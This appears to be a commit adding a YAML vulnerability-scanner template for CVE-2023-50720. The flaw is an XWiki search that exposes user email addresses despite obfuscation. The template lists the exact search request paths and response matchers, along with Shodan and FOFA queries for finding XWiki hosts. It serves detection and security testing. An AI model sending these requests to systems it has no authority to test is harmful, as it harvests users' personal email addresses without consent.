Create CVE-2023-50720.yaml

http/cves/2023/CVE-2023-50720.yaml

@@ -0,0 +1,51 @@
+id: CVE-2023-50720
+
+info:
+  name: XWiki < 4.10.15 - Email Disclosure
+  author: ritikchaddha
+  severity: medium
+  description: |
+    The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface.
+  impact: |
+    Successful exploitation could lead to disclosure of the email of all the users.
+  remediation: |
+    This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled.
+  reference:
+    - https://jira.xwiki.org/browse/XWIKI-20371
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-50720
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2023-50720
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 2
+    verified: true
+    vendor: xwiki
+    product: xwiki
+    shodan-query: html:"data-xwiki-reference"
+    fofa-query: body="data-xwiki-reference"
+  tags: cve,cve2024,xwiki,email,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"
+      - "{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "email</span> :"
+          - "XWiki.XWikiUsers[0]"
+          - "email_checked</span>"
+        condition: and
+
+      - type: status
+        status:
+          - 200